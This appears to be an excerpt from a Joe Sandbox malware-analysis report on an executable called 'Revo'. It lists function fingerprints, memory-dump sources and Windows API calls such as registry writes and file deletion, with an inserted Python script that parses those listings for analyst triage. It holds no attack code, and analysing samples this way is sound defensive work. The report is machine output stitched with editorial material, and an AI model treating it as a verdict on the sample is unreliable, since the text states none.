                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 27b0d047e0c308e0b5114cd8a4e3873cb63df72f9853a9642e586e78b8cecf79
                                                                                                                                                                            • Instruction ID: 4da454054b0c3dd02772a9c96e50ae6a11cdbe5b18e0bc5540401a1e7d1606fc
                                                                                                                                                                            • Opcode Fuzzy Hash: 27b0d047e0c308e0b5114cd8a4e3873cb63df72f9853a9642e586e78b8cecf79
                                                                                                                                                                            • Instruction Fuzzy Hash: E4813471D04228DBDF24CFA8C8847ADBBB1FF45305F24816AD456BB281C778AA86DF45
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 4f111ab4920ac525fdea371edc0372209efebd88f4f49b64d61f26737748280a
                                                                                                                                                                            • Instruction ID: a75c210e76fb72c91da92bd055febaaadf45c37f1dc492509737fdaa257f63d6
                                                                                                                                                                            • Opcode Fuzzy Hash: 4f111ab4920ac525fdea371edc0372209efebd88f4f49b64d61f26737748280a
                                                                                                                                                                            • Instruction Fuzzy Hash: 2D817731D04228DBDF24CFA8C844BADBBB1FF44315F20856AD856BB281C7796A86DF45
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: eb6308170f34cf48dfcb4d8f9c09bb4bb9b1200d68288f83770d90fe7aa59a96
                                                                                                                                                                            • Instruction ID: 2ce83fc52b21f36f835e1fdafd5cf74e6ced0850754c4da96a209bb8fab2d9ce
                                                                                                                                                                            • Opcode Fuzzy Hash: eb6308170f34cf48dfcb4d8f9c09bb4bb9b1200d68288f83770d90fe7aa59a96
                                                                                                                                                                            • Instruction Fuzzy Hash: 11712471D04228DBDF28CFA8C8847ADBBB1FF48305F15806AD856B7281C778A986DF55
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 35efb6cfb69a5e3ac5770c17f23e35896c35ba4500d931508133f68803cc17e7
                                                                                                                                                                            • Instruction ID: eaca5e257ecba6057ed761995cb39389c4d8ec983a179070fe5d03b82c062b57
                                                                                                                                                                            • Opcode Fuzzy Hash: 35efb6cfb69a5e3ac5770c17f23e35896c35ba4500d931508133f68803cc17e7
                                                                                                                                                                            • Instruction Fuzzy Hash: BF713671E04218DBDF28CFA8C884BADBBB1FF44305F14806AD856BB281C7786986DF55
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 3a7222321010e346b35687484556753c48e929d86f13e87db132154ce9d598b8
                                                                                                                                                                            • Instruction ID: 26522df2f7fda751442351ae768cbf4c3b612a3e7fb567ef5040218afec9c9a0
                                                                                                                                                                            • Opcode Fuzzy Hash: 3a7222321010e346b35687484556753c48e929d86f13e87db132154ce9d598b8
                                                                                                                                                                            • Instruction Fuzzy Hash: CB713771D04228DBEF28CF98C8447ADBBB1FF44305F15806AD856B7281C778A946DF45
APIs
• GlobalFree.KERNEL32(0B240048), ref: 00401C30
• GlobalAlloc.KERNEL32(00000040,00004004), ref: 00401C42
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Global$AllocFree
                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\PACK.EXE
                                                                                                                                                                            • API String ID: 3394109436-3974614470
                                                                                                                                                                            • Opcode ID: 189f3b68e03b00a9a17d4d6b4d599ebfe199962089991dc822aa892377f91a7d
                                                                                                                                                                            • Instruction ID: 411326a6bd5adc799c7b4966fae4248b5e735fb78bdcb674ef76145c70810545
                                                                                                                                                                            • Opcode Fuzzy Hash: 189f3b68e03b00a9a17d4d6b4d599ebfe199962089991dc822aa892377f91a7d
                                                                                                                                                                            • Instruction Fuzzy Hash: 7D210572A04150ABEB20EFA5DD9599E73A8AF14314714483FFA52F36D0C67C9C908B1D
APIs
• lstrlenW.KERNEL32(004125F8,00000023,00000011,00000002), ref: 004024FA
• RegSetValueExW.KERNEL32(?,?,?,?,004125F8,00000000,00000011,00000002), ref: 0040253A
• RegCloseKey.KERNEL32(?,?,?,004125F8,00000000,00000011,00000002), ref: 00402622
Memory Dump Source
• Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: CloseValuelstrlen
• String ID:
• API String ID: 2655323295-0
• Opcode ID: 939629d39815d1f7589cc98f3e393975f956bfb37faaf682d558e85f3089568e
• Instruction ID: 68b8ec3bea957dba5bf8d8436be9304697fc99dec5cd95401ddbf8672b0cd889
• Opcode Fuzzy Hash: 939629d39815d1f7589cc98f3e393975f956bfb37faaf682d558e85f3089568e
• Instruction Fuzzy Hash: D2118431D00114BEEB10AFA5DE9AEAEB6B4AF44318F21443FF504F71D1D7B98E419628
APIs
  • Part of subcall function 004069FF: FindFirstFileW.KERNEL32(74DF3420,0045A798,00456750,004060C2,00456750,00456750,00000000,00456750,00456750,74DF3420,?,74DF2EE0,00405DCE,?,74DF3420,74DF2EE0), ref: 00406A0A
  • Part of subcall function 004069FF: FindClose.KERNEL32(00000000), ref: 00406A16
• lstrlenW.KERNEL32 ref: 00402364
• lstrlenW.KERNEL32(00000000), ref: 0040236F
• SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402398
Memory Dump Source
• Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: FileFindlstrlen$CloseFirstOperation
• String ID:
• API String ID: 1486964399-0
• Opcode ID: 9995d0a3bc1ec283eb6257e663bd8360bd446cd403340e99a1a70e618ed02212
• Instruction ID: 7cef90a7dc384cf9c97021313212113070c2cd8574a9969a0abcfcfa4bc01db0
• Opcode Fuzzy Hash: 9995d0a3bc1ec283eb6257e663bd8360bd446cd403340e99a1a70e618ed02212
• Instruction Fuzzy Hash: 34113371914314D6DB10EFF98A4A59EB6BCAF04354F20443FA405F72D1D7B8C5418B59
APIs
• RegEnumKeyW.ADVAPI32(00000000,00000000,?,00001FFF), ref: 004025F6
• RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402609
• RegCloseKey.KERNEL32(?,?,?,004125F8,00000000,00000011,00000002), ref: 00402622
Memory Dump Source
• Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: Enum$CloseValue
• String ID:
• API String ID: 397863658-0
• Opcode ID: ef84c1a1fe8b1ff10c5e784e766aa331886d34ef38f0b3ab15ccb812864dae0e
• Instruction ID: ea3426adfb46afa29bf0fe74194f181189cf54c37864792d4d89e05057fb708c
• Opcode Fuzzy Hash: ef84c1a1fe8b1ff10c5e784e766aa331886d34ef38f0b3ab15ccb812864dae0e
• Instruction Fuzzy Hash: 4901DF71A00205BBEB149F94DE98AAFB678FF80308F10443EF001B21D0D7B84E01976D
APIs
  • Part of subcall function 0040616D: GetFileAttributesW.KERNEL32(?,?,00405D72,?,?,00000000,00405F48,?,?,?,?), ref: 00406172
  • Part of subcall function 0040616D: SetFileAttributesW.KERNEL32(?,00000000), ref: 00406186
• RemoveDirectoryW.KERNEL32(?,?,?,00000000,00405F48), ref: 00405D81
• DeleteFileW.KERNEL32(?,?,?,00000000,00405F48), ref: 00405D89
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00405DA1
Memory Dump Source
• Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: File$Attributes$DeleteDirectoryRemove
• String ID:
• API String ID: 1655745494-0
• Opcode ID: dd2cb9d4d09abd673c60ba1604a9489d115b5ba734863609cc63878b625e133a
• Instruction ID: 230036c29a26c5c6c0f0d9698206584c8b05a9663c1b6bdb31d330f7893cafd1
• Opcode Fuzzy Hash: dd2cb9d4d09abd673c60ba1604a9489d115b5ba734863609cc63878b625e133a
• Instruction Fuzzy Hash: A6E065312156915AC35057759E0CA6B2A98DFC6724F15893BF892F11D0CB7C884A8A6D
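The per-function API listings in this section are what an analyst scans to decide which functions to open in the disassembler first: the registry write through RegSetValueExW, the SHFileOperationW call and the RemoveDirectoryW/DeleteFileW pair, and the GlobalAlloc function whose similarity record carries the string C:\Users\user\AppData\Local\Temp\PACK.EXE. The Python below is an added editorial example, not part of the Joe Sandbox report and not code from the analysed sample: it parses listing lines of exactly this shape (direct calls and "Part of subcall function" entries) into records per function and tags the calls worth triaging first. The tag table, the assumption that each function's record starts at an "APIs" header and that its API list ends at the next "Strings" or "Memory Dump Source" header, and the embedded SAMPLE text (copied from the listings above with the long FindFirstFileW argument list trimmed) are this example's own.

```python
"""Parse Joe Sandbox per-function API listings and tag the calls to triage first.

Added example for reading listings like the ones in this report. It is not part
of Joe Sandbox or of the analysed sample; TAGS is this example's own choice.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# One "• Func.MODULE(args), ref: ADDR" line, optionally prefixed with
# "Part of subcall function ADDR:" for calls reached through a callee.
# The argument list and the comma are optional ("lstrlenW.KERNEL32 ref: 00402364").
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<func>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
STRING_ID_LINE = re.compile(r"^\s*•\s*String ID:\s*(?P<value>.*)$")
API_LIST_END = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# Assumed triage table: API name -> behaviour an analyst checks first.
TAGS = {
    "RegSetValueExW": "registry-write",
    "RegEnumKeyW": "registry-enum",
    "RegEnumValueW": "registry-enum",
    "DeleteFileW": "file-delete",
    "RemoveDirectoryW": "file-delete",
    "SHFileOperationW": "file-delete",
    "GetExitCodeProcess": "child-process",
    "WaitForSingleObject": "child-process",
}


@dataclass
class Call:
    func: str
    module: str
    args: list            # int for a literal hex argument, None for "?"
    ref: int              # address of the call site
    via_subcall: Optional[int] = None  # callee address for "Part of subcall" lines


@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)
    string_id: str = ""   # value of the "String ID" similarity line, if any

    @property
    def tags(self) -> set:
        return {TAGS[c.func] for c in self.calls if c.func in TAGS}

    @property
    def start(self) -> Optional[int]:
        """Lowest direct call-site address, a cheap proxy for the function's location."""
        direct = [c.ref for c in self.calls if c.via_subcall is None]
        return min(direct) if direct else None


def parse_args(text: Optional[str]) -> list:
    if not text:
        return []
    return [None if t.strip() == "?" else int(t, 16) for t in text.split(",")]


def parse_report(text: str) -> list:
    """Split the listing into one FunctionEntry per 'APIs' block."""
    entries, current, in_apis = [], None, False
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = FunctionEntry()
            entries.append(current)
            in_apis = True
            continue
        if current is None:
            continue
        if stripped in API_LIST_END:
            in_apis = False
        m = API_LINE.match(line) if in_apis else None
        if m:
            sub = m.group("sub")
            current.calls.append(Call(
                func=m.group("func"), module=m.group("module"),
                args=parse_args(m.group("args")), ref=int(m.group("ref"), 16),
                via_subcall=int(sub, 16) if sub else None,
            ))
            continue
        s = STRING_ID_LINE.match(line)
        if s:
            current.string_id = s.group("value").strip()
    return entries


def triage(text: str) -> list:
    """(start address, sorted tags, string) for every function that has a tag."""
    return [(e.start, sorted(e.tags), e.string_id)
            for e in parse_report(text) if e.tags]


# Constructed input: three records copied from the listings above, trimmed.
SAMPLE = """\
APIs
• lstrlenW.KERNEL32(004125F8,00000023,00000011,00000002), ref: 004024FA
• RegSetValueExW.KERNEL32(?,?,?,?,004125F8,00000000,00000011,00000002), ref: 0040253A
• RegCloseKey.KERNEL32(?,?,?,004125F8,00000000,00000011,00000002), ref: 00402622
Memory Dump Source
Similarity
• API ID: CloseValuelstrlen
• String ID:
APIs
  • Part of subcall function 004069FF: FindFirstFileW.KERNEL32(74DF3420,0045A798), ref: 00406A0A
  • Part of subcall function 004069FF: FindClose.KERNEL32(00000000), ref: 00406A16
• lstrlenW.KERNEL32 ref: 00402364
• lstrlenW.KERNEL32(00000000), ref: 0040236F
• SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402398
Memory Dump Source
Similarity
• String ID:
APIs
• GlobalFree.KERNEL32(0B240048), ref: 00401C30
• GlobalAlloc.KERNEL32(00000040,00004004), ref: 00401C42
Strings
Memory Dump Source
Similarity
• API ID: Global$AllocFree
• String ID: C:\\Users\\user\\AppData\\Local\\Temp\\PACK.EXE
"""

if __name__ == "__main__":
    for start, tags, string_id in triage(SAMPLE):
        print(f"{start:08X}  {', '.join(tags):16} {string_id}")
```

Running it on the three sample records reports the RegSetValueExW function (starting at 004024FA) as registry-write and the SHFileOperationW function (starting at 00402364) as file-delete; the GlobalAlloc function carries no tagged call and is left out, although its PACK.EXE string remains available on its entry for a second pass that keys on strings rather than APIs.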
APIs
• WaitForSingleObject.KERNEL32(?,00000064), ref: 00406B52
• WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00406B67
• GetExitCodeProcess.KERNEL32(?,?), ref: 00406B74
Memory Dump Source
• Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: ObjectSingleWait$CodeExitProcess
• String ID:
• API String ID: 2567322000-0
• Opcode ID: 8ff07581d1a9b179a96ae9e6ed15c74e4a8339333c72220da53f642c9193dd0c
                                                                                                                                                                            • Instruction ID: 0a43b9f96fb2b6b0c204ab13ec475b47687dff995c0faea4a1be46f6685e1a01
                                                                                                                                                                            • Opcode Fuzzy Hash: 8ff07581d1a9b179a96ae9e6ed15c74e4a8339333c72220da53f642c9193dd0c
                                                                                                                                                                            • Instruction Fuzzy Hash: AFE09271600218BBDB00AB54CD01EDE7B6ADB45700F104036B601B6190D6B5AE62DA98
APIs
• SendMessageW.USER32(00000408,?,00000000,00404259), ref: 00404618
Strings
Memory Dump Source
• Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: MessageSend
• String ID: x
• API String ID: 3850602802-2363233923
• Opcode ID: 6310f7611cc1ccfcf56369dd3329cceb302aac59914c28262eb7105b2c2a6a3a
• Instruction ID: 02f239cb91824dfe0454512e4452fc65e03e49c46eb4308609c978d489441530
• Opcode Fuzzy Hash: 6310f7611cc1ccfcf56369dd3329cceb302aac59914c28262eb7105b2c2a6a3a
• Instruction Fuzzy Hash: 8EC01271684200ABCA005B81EE00F177B20B7A5B02F20C87AF380200B096B6A461DB1E
APIs
• SetFilePointer.KERNEL32(00008001,00000000,00000000,00000000,00000000,?,?,00403342,000000FF,00000000,00000000,00008001,?), ref: 004033BB
Memory Dump Source
• Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: a5b36690e1ac02c72154c1ce5afa4b759e3a614c42b0341cc97078f1712af449
• Instruction ID: 1ca1e87bffa477aecce4b8809d13608721b46e5c52e0656af2305a29f618206d
• Opcode Fuzzy Hash: a5b36690e1ac02c72154c1ce5afa4b759e3a614c42b0341cc97078f1712af449
• Instruction Fuzzy Hash: E9317F30504219BBDB12DF55EE85A9E3FA8EB00359F10443BF905FA190D2788A509BA9
APIs
  • Part of subcall function 0040601C: CharNextW.USER32(?,?,00456750,?,00406090,00456750,00456750,74DF3420,?,74DF2EE0,00405DCE,?,74DF3420,74DF2EE0,004BD000), ref: 0040602A
  • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 0040602F
  • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 00406047
• GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 0040163F
  • Part of subcall function 00405BF6: CreateDirectoryW.KERNEL32(00481000,?), ref: 00405C38
• SetCurrentDirectoryW.KERNEL32(?,004C5000,?,00000000,000000F0), ref: 00401672
Memory Dump Source
• Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: CharNext$Directory$AttributesCreateCurrentFile
• String ID:
• API String ID: 1892508949-0
• Opcode ID: 95617658206366d970ee8daf205e3d31f177179551792a2a17772dbb13571d5c
• Instruction ID: 984bc8847ab7730807188d0ae4260eaffd58af59862b83f9ec54611d8a9cde38
• Opcode Fuzzy Hash: 95617658206366d970ee8daf205e3d31f177179551792a2a17772dbb13571d5c
• Instruction Fuzzy Hash: 0B11C431504514EBDF20AFA5CD4169F36A0EF14368B29493FF942B22F1D63E8981DA5E
APIs
• RegQueryValueExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402580
• RegCloseKey.KERNEL32(?,?,?,004125F8,00000000,00000011,00000002), ref: 00402622
Memory Dump Source
• Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
